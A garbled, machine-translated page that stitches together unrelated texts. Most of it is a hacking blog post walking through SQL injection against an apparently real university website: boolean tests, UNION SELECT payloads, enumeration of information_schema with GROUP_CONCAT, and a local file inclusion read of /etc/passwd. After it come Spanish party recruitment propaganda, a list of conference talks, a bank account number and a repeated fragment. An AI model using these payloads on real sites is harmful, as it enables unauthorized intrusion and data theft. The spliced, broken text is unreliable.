not just us ... [Part III] Continuing with the bugs in other universities ... Now we'll see a couple of errors in the website ... Well, I'm not saying that college xD
The first error is a typical SQL Injection. The vulnerable URL is:
http://palestra.??????.edu.pe/index.php?id =
Where is
vulnerable variable "id"
. First I tried putting a single quote to see if error occurred. The result was this:
Figure 1 - The web filters quotes.
As noted, the application has been charged with escape quote a prepending "\\"
therefore does not change the SQL command and no error occurs. But not always necessary to alter a quotation mark syntax. The numerical values \u200b\u200bneed not be in quotes in an SQL statement and we are dealing with this case;)
Using a test by contradiction we can see that yes we interfere in the query.
Fig. 2 - When an error is false.
Fig. 3 - When true shows the item.
When injected
"and 1 = 0" the condition will always be false and did not select any items so the application displays an error message. But when injected "and 1 = 1" condition
does not change and shows us the article with id 423.
Well, I discovered the vulnerability ... Now let's play a little.
After some time flirting with ORDER BY
we can conclude that 17 columns are selected. The truth was somewhat confusing because the id variable is used in 2 queries with different number of columns. Thus, while an error does not in the other self. Fortunately, the error of the second query does not prevent the first show the result;) already knowing the number of columns in the next step is to see which fields are displayed on the website. We will do a UNION SELECT  well: |
| / index.php? Id = null + union + select +1,2,3,4,5,6,7,8,9,10,11,12 , 13,14,15,16,17% 23 |
Fig. 4 - Distribution of the fields shown.
Pictured in the fields shown are 2, 3 and 5. We can use any of these to extract information from the database;)  A test mode will we get the name of the databases that exist in the server. To do this we query the table "schemata" of |
"information_schema" well: | |
/ index.php? Id = null + union + select +1,2,3,4, schema_name, 6, 7,8,9,10,11,12,13,14,15,16,17 + from + information_schema.schemata% 23
Fig. 5 - Only show the first result.  |
But note that only displays the first result. To view the other results we have the following choices: | |
request one by one all the names using the LIMIT clause
. Make a
"Serialized SQL Injection"
and display many of the names in a single query;)
Lo LIMIT
we have already explained before so it will be an excuse to learn something new. Serialized
SQL Injection is a technique that allows us to show many results of a query in one field visible. This is done using different methods according to the manager database (Oracle, SQL Server, MySQL, etc.) In the case of MySQL you use the "GROUP_CONCAT" that concatenates the results to the same group belong to one string .
The consultation would be serialized like this: / index.php? Id = null + union + select +1,2,3,4, GROUP_CONCAT (schema_name + +0 x20 separator), 6,7,8,9, 10,11,12,13,14,15,16,17 + from + information_schema.schemata% 23
Fig. 6 - Consultation serialized.  |
GROUP_CONCAT function lets you specify a separator. In this case, use as a separator | "0x20" | that is just a blank encoded in hexadecimal, not to use the quotes;)
The second vulnerability found on this site is an LFI. Yes, the same vuln which are explained in the first half. And you know SQLi + LFI is a very dangerous combination. Fortunately, for the admin site, the user of the database does not have the permission
"FILE"
that is what allows use "INTO OUTFILE" to inject the code. I leave
an image showing the
file "/ etc / passwd" proof of concept
:
 |
| |
Fig. 7 - PoC of LFI.
's all ... for today. Greetings. 
Need reasons? Presentation  surprising us all the hype that is being mounted in social networks etc before the starting gun that was given at headquarters. Little I can say about those who criticize us, because their own words they are describing themselves very well ... these threats, this attempt to shut up or ousted by rediculización so merely because it forces us the most are the ones we are supporting those who are putting their two cents. But perhaps there are people who need reasons to join, that are missing a empujonncito to convince, I hope that will convince you the following lines.
Affiliates to PP:
Why is a party that has its feet on the ground, avoiding radical ideas. Why do not we a nation of unemployed, but we want a country of entrepreneurs, people who work. Because people are the focus of policy. Because we do not accept "that the socialist international policy has led Spain to the third division of Europe. I am not resigned to that, a tiny percentage of votes, the Nationalists English end up dictating policy. " Because we want to discover the truth about the 11-M, negotiating with ETA etc being that we do not give quarter to the murderers. Why Spain defends progress, freedom and equality, the Spain of solidarity, tolerance, cutting-edge individual stimulus. Why do not we resign ourselves to "stop denouncing sectarianism Tinell Pact and profoundly undemocratic attitude of the PSOE which policy has, in the Basque elections of 2001, the sole aim to stigmatize our Party and its members, supporters and voters. " Why do not we want our country to be a hindrance to Europe, but we want to be part of the locomotive. For this and much more, if you believe in individual autonomy and equality of citizenship, Afliate! In NNGG many young people like you. And of course, feel free to visit afiliatealPP.com
New Generation submitted its campaign Ciudad Lineal membership on March 10, 2011 with a large attendance at district headquarters, highlighting the presence of Alcayde Germain, Secretary of NNGG Madrid. This campaign, which has already harvested many fruits, is to get young people in the district to mobilize and participate in the improvement and maintenance of district and city, showing that young people are not "liberals" that are made with a closed fist by defending the Republic. In the coming weeks we will show that young people are not with the Che, Chavez or ZP. No, young people are with those who take people as the basis of its policies, in the case of Madrid, Esperanza Aguirre and Alberto Ruiz Gallardon. Indeed, as Germain has told us in the wonderful evening that has taken us chairing our Executive Committee, now more than ever is the time to mobilize youth for municipalities to be the beginning of the end of ZP stale and socialism that has plunged the country into a crisis that will have to remove the Partido Popular. But the evening did not remain there alone. It has also been realized so far the performance of the executive committee, submitting all the platforms that have NNGG fully operational to meet the goal of being present in all places in a serious and determined. Thus we have presented the new face that look the website (http://www.nnggclineal.org/) and blog (http://clineal.blogspot.com/) as well as detailing the presence we have in most important social networks (Tuenti, Facebook, Twitter ...). After all the presentation has been open question time where perhaps we should highlight the involvement of a member, who asked to Germain on immigrants in Madrid and the party's performance in this problem. It actually reminded as the Community of Madrid was the first region of Spain that created an immigration counseling etc. He also explained as concern the party was immigrants is evident, and can be seen in the case of our district with the coordination that exists by our president Sonsoles with associations of foreigners in Ciudad Lineal
not just us ... [Part II]
|
| |
Hello ... for those who could not attend for any reason and for those who want to see again talks with some more patience I will leave this post the videos of all LimaHack @ UNMSM conference.
I'll update the post as I upload more videos. PhD in Metasploit exploitation
Mom: In Reverse Engineer wants to be  |
| |
Lockpicking 101
toppling Tux ... Creating exploits for Linux
or translated into other languages. So we can only do a search on Google for that phrase. 
Well I leave a copy & paste of what is posted on his facebook page 
Current Account No.: 00-015-009950 
A test mode will we get the name of the databases that exist in the server. To do this we query the table 
